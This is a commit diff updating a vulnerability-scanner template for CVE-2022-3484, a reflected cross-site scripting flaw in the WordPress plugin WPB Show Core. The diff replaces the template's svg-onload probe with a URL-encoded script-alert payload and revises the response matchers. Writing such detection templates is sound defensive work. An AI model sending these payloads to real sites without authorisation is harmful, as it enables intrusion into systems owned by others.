Update CVE-2022-3484.yaml

patch-1
Ritik Chaddha 2022-11-16 16:22:06 +05:30 committed by GitHub
parent cda2fd4357
commit 9a2fdd421b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 11 deletions

View File

@ -1,7 +1,7 @@
id: CVE-2022-3484
info:
name: WPB Show Core - Reflected Cross-Site Scripting
name: WPB Show Core - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
@ -10,25 +10,21 @@ info:
- https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464
- https://nvd.nist.gov/vuln/detail/CVE-2022-3484
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-3484
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan
verified: true
tags: cve,cve2022,wp,wordpress,wp-plugin,xss,wpb-show-core
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=<svg+onload%3Dconfirm(document.domain)>'
- '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "<svg onload=confirm(document.domain)>")'
- 'contains(body, "wpb_jplayer_setting")'
- 'contains(content_type, "text/html")'
condition: and
- 'contains(body, "wpb_jplayer_setting")'
- 'contains(body, "<script>alert(document.domain)</script>")'
condition: and